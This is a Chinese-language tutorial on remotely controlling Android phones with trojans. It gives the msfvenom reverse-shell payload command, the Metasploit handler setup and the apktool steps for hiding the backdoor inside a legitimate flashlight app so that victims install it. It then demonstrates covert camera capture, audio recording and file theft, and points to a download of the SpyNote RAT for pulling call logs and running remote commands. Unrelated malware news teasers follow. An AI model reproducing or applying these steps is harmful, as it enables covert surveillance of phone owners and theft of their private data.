如何利用手機木馬遠程控制

2021-02-13 黑客網絡技術
1.實驗涉及復現環境    

Kali平臺(Hack):192.168.0.101

Android模擬器(靶機1):192.168.0.106

Android魅族note2手機(靶機2):192.168.0.104

Java環境,.net環境構建 。(spyNote軟體需要環境)

2.環境配置二Android模擬器

2.1首先從官網上下載雷電模擬器

2.2下載完後。點擊.exe文件直接運行安裝,運行,下一步,直接完成安裝。

 

2.3 安裝完成後在電腦桌面顯示下面logo

2.4 對模擬器網絡進行配置在右邊的設置裡面選擇設置>網絡設置>網絡橋接模式開啟,ip設置dhcp,最下面點擊安裝:

 

2.5 安裝成功後顯示安裝成功:

 

3.生成後門

3.1打開虛擬機,啟動kali,打開終端,生成apk後門。lhost為windows的ip(可以根據自己的IP設定),lport指定一個埠5001。打開終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R > /etc/222.apk

 

(生成apk文件)

3.2生成文件後我們到/etc/222.apk目錄下拷貝我們的apk文件到我們的windows平臺下然後啟動我們的雷電模擬器,點擊啟動:

 

(啟動界面)

3.3在右下角有個apk,點擊選擇文件安裝。

 

3.4然後為了測試我們使用模擬器安裝apk文件:

 

(成功安裝木馬文件)

4 使用metasploit控制臺對模擬器進行攻擊:

4.1 啟動metasploit:

 

(啟動界面)

4.2 使用模塊:use exploit/multi/handler

 

(設置exploit)

4.3 設置模塊set payload android/meterpreter/reverse_tcp

 

(paload設置)

4.4 設置攻擊機和埠號和啟動:

 

(參數配置)

4.5 顯示正在監聽靶機:

 

(監聽中)

4.6 回到我們的模擬器靶機,我們點擊運行我們安裝的文件

 

(雙擊運行)

4.7 看到成功返回shell

 

(返回shell)

4.8 查看模擬手機的版本信息:sysinfo

 

(手機作業系統信息)

4.9 返回我們的模擬器,啟動虛擬終端,查看攻擊機和靶機的建立的聯繫:

 

(靶機被控的聯繫)

5 啟用真機測試

5.1 步驟如以上環境,我在自己的手機上安裝這個apk文件:

 

(note2手機安裝)

5.2 按照上面獲取shell的方法成功連接真機.:

 

(連接真機成功)

5.3 手機攻擊演示:獲取版本信息:

 

(手機版本信息)

5.4查看網絡信息:(ifconfig)

 

(手機網絡狀態)

5.5查看root狀態:

 

(顯示手機未root)

5.6 啟用網頁視屏聊天:

 

(手機未找到合適的瀏覽器打開)

5.7查看手機有幾個攝像頭

 

(顯示有2個)

5.8進行調用攝像頭偷拍(默認前置攝像頭):

 

5.9網頁攝像機視屏流,顯示實時畫面能夠調用攝像頭,實時觀看被攻擊者的像機對著的物體,以下為通過此辦法獲取到的一段圖片資料:

5.10 進行錄音操作:

 

(成功錄音並保存)

5.11 獲得shell後有很多的攻擊方法,我就不一一操作,將其匯總如下:

(網絡和系統信息獲取)

 

(系統命令執行和攝像頭操作)

6 遠控升級之捆綁app:

說明:現實生活中沒有人會傻乎乎的下載個木馬apk文件呀,所以我們的通過一些偽裝的辦法,將apk木馬文件捆綁在用戶常用的App上,誘導用戶下載使用。步驟如下:先捋一下思路,把PAYLOAD小馬注入到一個目標apk文件中,關鍵是要找到目標APK的入口,並把啟動payload小馬的代碼添加進去,隨目標APK一起啟動,從而實現監聽手機的目的。當然前提是apk文件可逆。這裡使用注入目標apk文件:手電筒—-魅族市場下載的(名為shoudiantong.apk)。我們使用上文攻擊魅族手機用到的222.apk文件。

6.1 反編譯payload小馬222.apk和shoudiantong.apk(說明:反編譯軟體kali系統中自帶,以下操作在windows,所以需要下載一個apktool。

命令:

apktool d houmen.apk

apktool d shoudiantong.apk

 

(反編譯生成兩個新文件)

6.2 開始尋找手電筒shoudiantong.apk文件的入口,在手電筒shoudiantong的Manifest.xml文件中查找Main和Launch關鍵詞,定位到所對應的啟動smail文件

 

6.3 直接搜索onCreat函數,找到bundle對象,你並在下面添加啟動paload添加如下代碼:(改動文件:MainActivety.smail)

 

6.4 點擊保存之後呢,我們還要把剛才反編譯的payload文件中的smail代碼複製過來,把payload的smail/com/metasploit文件複製到手電筒的smail/com/目錄下。

6.5 回編譯:apktool b shoudiantong.apk

 

6.6 籤名,這一部需要完成,發現沒有籤名的apk文件安裝時會解析錯誤,生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222因為我在本機沒有這個工具,所以在kali系統完成:

 

6.7 給shoudiantong.apk籤名:

 

6.8 Shoudiantong.apk木馬文件測試,將手電筒apk文件裝在手機上:

 

6.9 打開並正常使用完全沒問題:

 

7 進行手機攻擊

7.1 查看手機與攻擊機建立的聯繫

 

7.2 試著操作一些上述沒有操作過的命令試試:

 

7.3 查看路由信息:

 

7.4 ps查看進程:

 

8 總結:

通過對手機木馬文件對手機的植入,我們可以成功的對手機進行控制,其中包括對手機使用者進行錄音、拍照、查看下載手機私密文件,獲取手機網絡信息,進程信息等。實現對手機的完全控制。本文簡單介紹如何將木馬文件綁定到正常app實現對受害者攻擊,其實還有很多辦法,如通過中間人、釣魚實現木馬植入等。

9 圖形界面控制軟體SpyNote的使用:10 環境配置三java環境和.net環境:

11 spynote安裝使用

11.1百度搜索「spynote下載」找到相應的安裝包,或者訪問地址:(http://www.rekings.com/spynote-v5-android-rat/)進行下載下載後使用解壓密碼:rekings.com打開:

11.2 雙擊運行軟體出現以下界面填寫一個大於1023的埠,默認2222

 

(填寫埠)

11.3配置生成木馬apk文件我這裡配置埠:222我們的攻擊機為:192.168.0.100也就是我計算機的ip,然後應用的名字test,點擊上方的build就可以生成文件:

11.4演示過程涉及一些個人隱私,所以在演示的過程中我們用上面實驗中用到的手機模擬器來代替打開我們的雷電模擬器,點擊右下角的apk安裝,把我們生成的apk文件安裝(test.apk文件默認放在C:\Administrator\output):

(安裝apk文件)

12 攻擊演示:

12.1 回到spyNote軟體,我們發現有一臺機器成功上線:

12.2 在設備上右擊選擇 tools P依次有一些命令執行:

(攻擊方式)

12.3 我們選擇tools p>record calls得到手機的通話記錄

(通話記錄)

12.4 我們選擇tools p>record calls得到手機的通話記錄install aplications查看手機的安裝的應用軟體:

(安裝的軟體)

12.5 我們選擇tools p>file managerke可以查看手機裡面的文件,可以任意下載,拷貝,刪除等等。

 

(文件管理)

12.6 我們選擇tools p>romote commands可以進行遠程終端管理:

(遠程終端管理)

13 總結:

功能太多,不一一演示,其中還包括照相、監聽電話聲音、查看通訊錄、發送簡訊等等一些功能,等於自己手機咯都不用買手機

相關焦點

  • 【黑客教程】利用木馬遠程控制目標手機
    apk文件呀,所以我們的通過一些偽裝的辦法,將apk木馬文件捆綁在用戶常用的App上,誘導用戶下載使用。 7.4 ps查看進程: 8 總結:通過對手機木馬文件對手機的植入,我們可以成功的對手機進行控制,其中包括對手機使用者進行錄音、拍照、查看下載手機私密文件,獲取手機網絡信息,進程信息等。
  • 警惕Office盜版激活工具中隱藏的遠程控制木馬
    長按二維碼關注御見威脅情報中心概述騰訊御見威脅情報中心檢測到一款Office激活工具被捆綁傳播遠程控制木馬
  • 挖礦木馬針對SQL伺服器的爆破攻擊,中招可致伺服器被遠程控制
    長按二維碼關注御見威脅情報中心背景騰訊御見威脅情報中心檢測到一例挖礦木馬攻擊
  • WatchBogMiner木馬利用漏洞攻擊傳播,已控制上萬臺Linux伺服器挖礦
    該木馬利用Nexus Repository Manager、Supervisord、ThinkPHP等伺服器組件的遠程代碼執行漏洞進行攻擊,在失陷機器安裝多種類型的持久化攻擊代碼,然後植入門羅幣挖礦木馬進行挖礦。騰訊安全專家根據木馬使用的算力資源推測已有上萬臺Linux伺服器被黑客控制,已挖到28個門羅幣,收益約1.3萬元。
  • 利用5G通信和遠程控制補充和輔助自動駕駛
    ,日本通信三巨頭NTT DOCOMO、KDDI、軟銀以同一主題「5G如何改變網聯汽車?將區域分割成一定的小區(Cell),在各小區內部署基站,利用目前用於手機與智慧型手機的無線通信設備。蜂窩V2X是使用LTE或5G的V2X,支持通過基站的通信以及直接通信兩種方式。
  • 警惕「偽裝者」木馬攻擊,會將遠控木馬和挖礦木馬裝在電腦上
    長按二維碼關注御見威脅情報中心一、概述騰訊安全御見威脅情報中心近期捕獲到一批偽裝成各類正常「軟體程序」進行攻擊的病毒,看起來可能下載了個工具軟體,運行後,「偽裝者」木馬內置的惡意腳本就會從病毒控制者的伺服器下載遠程控制木馬和門羅幣挖礦木馬運行
  • 死神礦工(ThanatosMiner)來了,騰訊安全捕獲利用BlueKeep高危漏洞攻擊傳播的挖礦木馬
    利用BlueKeep漏洞CVE-2019-0708攻擊傳播。攻擊者將公開的Python版本BlueKeep漏洞利用代碼打包生成scan.exe,大範圍掃描隨機生成的IP位址進行探測和攻擊。漏洞利用成功後執行shellcode下載C#編寫的木馬svchost.exe,然後利用該木馬下載門羅幣挖礦木馬以及攻擊模塊進行下一輪攻擊。
  • 預警:Mac木馬出新招,利用俄羅斯太空計劃作誘餌文件
    近日,國外一家安全公司Palo Alto追蹤到了一種新的Mac OS X 惡意木馬病毒,這個惡意木馬病毒利用俄羅斯太空計劃做誘餌,在入侵裝有Mac OS X 系統的電腦後,會自動保存一個聲稱與俄國太空計劃有關的PDF文件,用戶打開文件後就會中招。
  • H2Miner黑產團夥利用SaltStack漏洞控制伺服器挖礦,已獲利370萬元
    騰訊安全威脅情報中心大數據統計結果顯示,H2Miner利用SaltStack漏洞的攻擊自5月3日開始,目前呈快速增長趨勢。H2Miner挖礦木馬運行時會嘗試卸載伺服器的安全軟體,清除伺服器安裝的其他挖礦木馬,以獨佔伺服器資源。目前,H2Miner黑產團夥通過控制伺服器進行門羅幣挖礦已非法獲利超370萬元。
  • KoiMiner挖礦木馬再度活躍 控制者來自某黑客論壇
    近期騰訊御見威脅情報中心再次檢測到KoiMiner活動,此次的樣本仍然專門針對企業SQL Server 伺服器的1433埠爆破攻擊,攻擊成功後會首先植入Zegost遠程控制木馬(知名遠控木馬Gh0st的修改版本,安裝後會導致伺服器被黑客完全控制),控制機器進一步植入挖礦木馬。
  • 挖礦木馬SysupdataMiner利用多個漏洞同時攻擊Windows、Linux
    該挖礦木馬利用SSH免密登錄的漏洞在內網傳播,然後利用掃描工具掃描外網Redis伺服器並進行弱口令爆破攻擊。在感染的機器上,SysupdataMiner會檢測阿里雲騎士和騰訊雲鏡並進行卸載,會通過多種特徵檢測其他挖礦木馬並進行清除,然後下載門羅幣挖礦木馬sysupdata並啟動。
  • 黑客常用術語 ,肉雞、木馬、後門、掛馬...
    木馬那些表面上偽裝成正常的程序,但是當這些程序運行時,就會獲取系統的整個控制權限。有很多黑客熱衷於使用木馬程序來控制別人的電腦。比如:灰鴿子、黑洞、PcShare等。網頁木馬表面上偽裝成普通的網頁文件或將自己的代碼直接插入到正常的網頁文件中,當有人訪問時,網頁木馬就會利用對方系統或者瀏覽器的漏洞自動將配置的木馬伺服器下載到訪問者的電腦來自動執行。
  • WannaMiner挖礦木馬不光擅長黑吃黑,最新變種還會過河拆橋
    XMR(門羅幣)同時還會下載遠程控制木馬,為了獨佔系統資源,這個WannaMiner挖礦木馬的最新變種會查殺其他挖礦木馬。WannaMiner新變種具有如下特點:冒充微軟系統文件,關閉Windows防火牆,添加任務自啟動;釋放NSA攻擊工具套件(永恆之藍),掃描內網445埠橫向擴散;釋放遠程控制木馬java.exe(文件名偽裝),該遠控木馬具有系統最高權限,可實現竊取隱私及一切遠程管理任務;
  • 快Go礦工(KuaiGoMiner)控制數萬電腦挖礦,釋放遠控木馬竊取機密
    該木馬利用NSA武器中的「雙脈衝星」、「永恆浪漫」、「永恆之藍」攻擊工具針對網際網路上的機器進行掃描攻擊,並在攻擊成功後植入挖礦和遠控木馬,已控制數萬臺電腦。因其使用的C2域名中包含「kuai-Go」,御見威脅情報中心將其命名為「快Go礦工」(KuaiGoMiner)。
  • 騰訊安全捕獲新威脅:利用Hadoop Yarn REST API未授權漏洞攻擊雲主機,安裝多種木馬通過SSH爆破擴散
    Hadoop Yarn REST API未授權命令執行漏洞攻擊雲上主機,攻擊成功後執行惡意命令,向系統植入挖礦木馬、IRC BotNet後門、DDoS攻擊木馬,入侵成功後還會使用SSH爆破的方式進一步向目標網絡橫向擴散。
  • 「大灰狼」遠控木馬偽裝成「會所會員資料」傳播,打開前可要留神哦
    經分析,該木馬變種由「XINKE」木馬團夥利用多個釣魚文檔以及Flash漏洞(exploit.cve-2018-15982)掛馬傳播,中毒電腦會被攻擊者完全控制。註:「XINKE」木馬團夥,是騰訊御見威脅情報中心通過社區發現算法發現的病毒木馬黑產團夥。
  • 利用施耐德PLC模擬器漏洞可遠程控制工作站
    用於向施耐德電氣公司各種工業控制器編輯和部署代碼的軟體存在漏洞,攻擊者可向工業工程軟體發送惡意代碼,遠程控制用於編程和控制PLC(可編程邏輯控制器
  • 美國CIA黑進全球電腦,監控手機,你可能隨時被抓....
    此次,維基解密一共放出了8761份CIA文件,文件詳細描述了CIA如何利用惡意軟體和木馬程序,通過手機、電腦、電視等設備侵入監控目標的系統對其進行監控。真是嚇死主頁君了,美國這下真是徹底裸奔了。。。From 英國那些事兒微信號:hereinuk話說,在美國大選之後,維基解密消停了一陣然而最後,他們又爆了個大新聞...
  • 挖礦木馬z0Miner正利用Confluence漏洞發起攻擊
    近日,趨勢科技發現挖礦木馬 z0Miner 一直在利用 Atlassian 的 Confluence 遠程代碼執行漏洞(CVE-2021-26084
  • 「美人蠍」挖礦木馬再度來襲,利用Windows系統組件啟動惡意腳本
    「美人蠍」挖礦木馬變種採用的新特性包括:白利用winrm.vbs啟動powershell腳本,或通過NSSM將powershell腳本安裝為服務,多次將惡意代碼通過內存注入系統白進程來減少文件落地從而躲避系統安全功能或殺毒軟體的攔截。